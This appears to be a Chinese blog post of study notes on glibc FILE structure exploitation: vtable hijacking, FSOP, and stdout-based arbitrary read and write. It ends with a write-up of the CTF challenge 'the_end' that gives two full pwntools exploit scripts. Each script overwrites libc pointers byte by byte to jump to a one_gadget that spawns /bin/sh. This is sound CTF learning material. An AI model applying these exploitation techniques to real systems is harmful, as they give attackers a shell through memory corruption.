    _IO_file_xsputn
    _IO_file_overflow
    funlockfile
    _IO_file_write
    write

    自己试出来的几种,有些不同都是得自己去看源码啊(跪),好像和上面比起来没有看到那个overflow:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    ► f 0     7ffff7b042b0 write(没有setbuf,输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a8647d _IO_file_xsputn+669
    f 5 7ffff7a5a92d vfprintf+1981
    f 6 7ffff7a62899 printf+153
    f 7 40053e main+24

    ► f 0 7ffff7b042b0 write()(setbuf(stdout,0),输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44

    ► f 0 7ffff7b042b0 write(没有setbuf,输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a89196 _IO_flush_all_lockp+374
    f 5 7ffff7a8932a _IO_cleanup+26
    f 6 7ffff7a46f9b __run_exit_handlers+139
    f 7 7ffff7a47045
    f 8 7ffff7a2d837 __libc_start_main+247

    ► f 0 7ffff7b042b0 write(setbuf(stdout,0),输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44
  4. exit->__run_exit_handlers->_IO_cleanup->_IO_flush_all_lockp
    控制stdinstdout或者stderr中实现fp->_mode <= 0以及fp->_IO_write_ptr > fp->_IO_write_base同时修改vtable里面的_IO_OVERFLOW为one gadget(来自raycp师傅的博客)

  5. 程序结束时在_dl_fini_中调用_rtld_global结构体的__rtld_lock_lock_recursive(来自raycp师傅的博客),准确来说这个不算FILE里面的,不过还是写一下记一下比较好

自己的调试代码

调试之前写了一个有0x40个a的test.txt(用python -c写进去的,因为无论用vim还是gedit好像都会在保存时自动加一个换行符,比较搞,用cat test.txt|hd就可以看到结尾是不是有换行符)

然后用下面的代码调试了一下…调试细节先放着,这个是帮我用来探索前面几个指针是怎么用的,还有很多细节其实都不太清楚,以后玩源码的时候再来看(结果写题的时候就发现直接用gdb p一下那个符号好像更明确….我佛了,不行就加上(_IO_FILE_plus *)转换一下地址的类型,这样看来代码写的好像多余了2333333)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>

void printFILE(FILE * tmp)
{
fprintf(stderr, "_flags:%#x\n",*(int*)((unsigned int)tmp+offsetof(_IO_FILE,_flags)));
fprintf(stderr, "_IO_read_ptr:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_read_ptr)));
fprintf(stderr, "_IO_read_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_read_end)));
fprintf(stderr, "_IO_read_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_read_base)));
fprintf(stderr, "_IO_write_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_write_base)));
fprintf(stderr, "_IO_write_ptr:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_write_ptr)));
fprintf(stderr, "_IO_write_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_write_end)));
fprintf(stderr, "_IO_buf_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_buf_base)));
fprintf(stderr, "_IO_buf_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_buf_end)));
fprintf(stderr, "_IO_save_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_save_base)));
fprintf(stderr, "_IO_backup_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_backup_base)));
fprintf(stderr, "_IO_save_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_save_end)));
fprintf(stderr, "_markers:%p\n",*(struct _IO_marker **)((unsigned int)tmp+offsetof(_IO_FILE,_markers)));
fprintf(stderr, "_chain:%p\n",*(struct _IO_FILE **)((unsigned int)tmp+offsetof(_IO_FILE,_chain)));
fprintf(stderr, "_fileno:%#x\n",*(int*)((unsigned int)tmp+offsetof(_IO_FILE,_fileno)));
fprintf(stderr, "_flags2:%#x\n",*(int*)((unsigned int)tmp+offsetof(_IO_FILE,_flags2)));
fprintf(stderr, "_old_offset:%#x\n",*(_IO_off_t *)((unsigned int)tmp+offsetof(_IO_FILE,_old_offset)));
fprintf(stderr, "_cur_column:%#x\n",*(unsigned short *)((unsigned int)tmp+offsetof(_IO_FILE,_cur_column)));
fprintf(stderr, "_vtable_offset:%#x\n",*(signed char *)((unsigned int)tmp+offsetof(_IO_FILE,_vtable_offset)));
fprintf(stderr, "_shortbuf:%#x\n",*(char *)((unsigned int)tmp+offsetof(_IO_FILE,_shortbuf)));
fprintf(stderr, "_lock:%#x\n\n",*(unsigned int*)(_IO_lock_t *)((unsigned int)tmp+offsetof(_IO_FILE,_lock)));

fprintf(stderr, "vatable*:%p\n\n",*(unsigned int **)((unsigned int)tmp+sizeof(_IO_FILE)));
}
int main(){
fprintf(stderr, "Let's see what FILE* have(x64):\n");
fprintf(stderr, "The fopen will malloc a chunk to store the FILE structure and return a ptr to the structure chunk");
fprintf(stderr, "Let's do fopen\n");
FILE *f=fopen("test.txt","r+");
fprintf(stderr, "And we can see what exactly the structure have at the beginning:\n");
printFILE(f);

fprintf(stderr, "Then we read something from the file(0x20)\n");
char buffer[0x30]={0};
fread(buffer,1,0x20,f);
fprintf(stderr, "buffer<%s><%#x>\n",buffer,strlen(buffer));
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

memset(buffer,0,0x30);
strcpy(buffer,"bbbbbbbbbbbbbbbb");
fprintf(stderr, "Then we write something to the file('b'*0x10)\n");
fwrite(buffer,1,strlen(buffer),f);
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

fprintf(stderr, "Try fflush\n");
fflush(f);
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

memset(buffer,0,0x30);
fprintf(stderr, "Read again(0x20)\n");
fread(buffer,1,0x20,f);
fprintf(stderr, "buffer<%s><%#x>\n",buffer,strlen(buffer));
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

memset(buffer,'*',0x30);
fprintf(stderr, "Write again('*'*0x20)\n");
fwrite(buffer,1,0x20,f);
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

fflush(f);

fclose(f);
fprintf(stderr, "Now the FILE looks like(Use after free):\n");
printFILE(f);
return 0;
}

其中最主要的大概是fopen时malloc了一个0x230的chunk来存放结构体,然后第一次调用fread时分配了一个0x1000的文件缓冲区,第一次会把文件的全部内容都读到这个缓冲区里面(正确与否有待深究,自己看来暂时是这样)

1582612886398

_chain域的链接此时结构大概是:_IO_list_all->f->_IO_2_1_stderr_->_IO_2_1_stdout_->_IO_2_1_stdin_->NULL

其中_IO_list_all是一个变量,存储着指向f结构体的指针(以上图为例就是0x603010),f在fopen操作时初始化的FILE*就被链入了这个链表

再就是fclose会直接把对应的两个chunk一起释放了,释放顺序是先释放文件缓冲区再释放结构体chunk

Hijack

至于vtable在_IO_FILE_plus中的偏移量,摘自wiki就是:在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8(wiki)

如果我们伪造一个vtable,然后修改对应FILE结构体的vtable指针指向我们伪造的vtable,就可以达到劫持程序的目的(不得不说vtable大法好啊23333)

目前 libc2.23 版本下,位于 libc 数据段的 vtable 是不可以进行写入的。不过,通过在可控的内存中伪造 vtable 的方法依然可以实现利用(wiki)

vatble对应的段属性如下所示,在不可写段:

1582618757197

(wiki上面关于修改vtable的描述已经很详细了,这里不再赘述,主要是以记笔记为主)

因为 vtable 中的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递,因此这里我们把 “sh” 写入_IO_FILE_plus 头部。之后对 fwrite 的调用就会经过我们伪造的 vtable 执行 system(“sh”)
(或者直接试着填one_gadget

leak

(来自raycp师傅的博客)

控制stdout结构体满足以下条件实现任意泄露:

  • _IO_write_base指向想要泄露的地方。
  • _IO_write_ptr指向泄露结束的地址。
  • _IO_read_end等于_IO_write_base以绕过多余的代码。 满足这三个条件,可实现任意读。当然不包含结构体里的_flags字段的伪造,该字段都从原来的结构体里面复制过来,所以就没去分析该如何构造了。

Arbitrary write

(来自raycp师傅的博客)

_IO_write_end 大于_IO_write_ptr时,memcpy就会调用

只需要将_IO_write_ptr指向需要写的地址,_IO_write_end指向结束位置即可

有了任意读与任意写之后,具体实现就是使用任意读泄露libc地址,然后用任意写将one gadget写到malloc_hook中,然后利用%n报错或者是较大的字符打印来触发malloc函数

the_end

只看概念当然不代表会用了,肯定要写个题印象才深23333

程序分析

1582615573201

程序逻辑非常简单,就是给了一个libc地址,然后任意地址写5次,一次一字节,但是程序开启了PIE和Full RELRO,无法改写程序段的内容,这里我由于是第一次写FILE类型的题,所以就参考了师傅们的WP学了很多(看完的感触就是挖洞果然撸源码是王道啊….)

当然还有从各路师傅那听来的Ex师傅的博客,真的学到了不少东西

Exploit1

第一种办法是修改stdin/stdout/stderr任一FILE的vtable指针指向我们可控的区域,由于ubuntu libc2.23存放vtable的段不可写,所以不能直接改vtable。改指针的时候也特别巧妙,改的是指针第二个字节,所以可以在可写的段再去找合适的偏移,当然这里的解法都是参考raycp师傅学的新姿势,所以更清晰明了的解释就推荐去看原博主的文了

这个方法里面一共改了三处,5次:
第一处:stdin/stdout/stderr任一FILE的 _IO_write_ptr,使其大于_IO_write_base
第二处:对应vtable指针第二字节,改写的地址对应偏移需要有libc地址
第三处:对应偏移处有libc地址,修改低三字节

可能自己接触比较新的就是在libc找合适的地方去改地址
我用的命令是 search -p 0x7fxxxx -w,在GDB里面可以直接找到可写的而且有这个地址的内存,然后通过我们需要的偏移比对哪个地址是我们需要的,因为vtable里面是存在偏移的,如果实在是找不到可能就失败了,当然找到的概率还是很大的,毕竟师傅们的利用都这么多了XD

ps:原来这个就是FSOP,开始还以为FSOP是更深一点的知识,然后点开wiki的FSOP之后发现就是这个23333,一举两得?

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)

'''
# todo here
def writeByte(address,Byte):
p.send(p64(address))
sleep(0.1)
p.send(Byte)
sleep(0.1)

p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)
'''stdout
stdout_IO_write_ptr=0x3c5648
stdout_vtable_off=0x3c56f8
address_off=0x3c53e0
func_off=0x3c53f8
'''
stdin_IO_write_ptr=0x3c4908
stdin_vtable_off=0x3c49b8
address_off=0x3c53e0
func_off=0x3c53f8

#gdb.attach(p,'brva 0x950')
writeByte(stdin_IO_write_ptr+libc_base,'\xff')
off=address_off+libc_base
off=(off>>8)&0xff
off=chr(off)
writeByte(stdin_vtable_off+libc_base+1,off)
one_off=0xf1147+libc_base
one_off1=chr(one_off&0xff)
one_off2=chr((one_off&0xff00)>>8)
one_off3=chr((one_off&0xff0000)>>16)

writeByte(func_off+libc_base,one_off1)
writeByte(func_off+libc_base+1,one_off2)
writeByte(func_off+libc_base+2,one_off3)

p.interactive()

Exploit2

第二种方法真的是让我感受到了函数指针的伟大23333,简直是Control the ptr ,control the world,这些利用都太奇妙了,再就是源码大法好,以后一定要多看看源码

这里是直接修改的_rtld_global._dl_rtld_lock_recursive这个函数指针….甚至是直接修改地址第三位就可以了…真的tql,被师傅们强大到,以后菜鸡一定多看看源码

直接放exp吧都没什么好写的了23333

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
# todo here
def writeByte(address,Byte):
p.send(p64(address))
sleep(0.1)
p.send(Byte)
sleep(0.1)

p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)

ptr_off_set=0x5f0f48
one_gadget=0xf02a4+libc_base
off1=one_gadget&0xff
off2=(one_gadget&0xff00)>>8
off3=(one_gadget&0xff0000)>>16
#gdb.attach(p,'brva 0x950')
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set+1,chr(off2))
writeByte(libc_base+ptr_off_set+2,chr(off3))


p.interactive()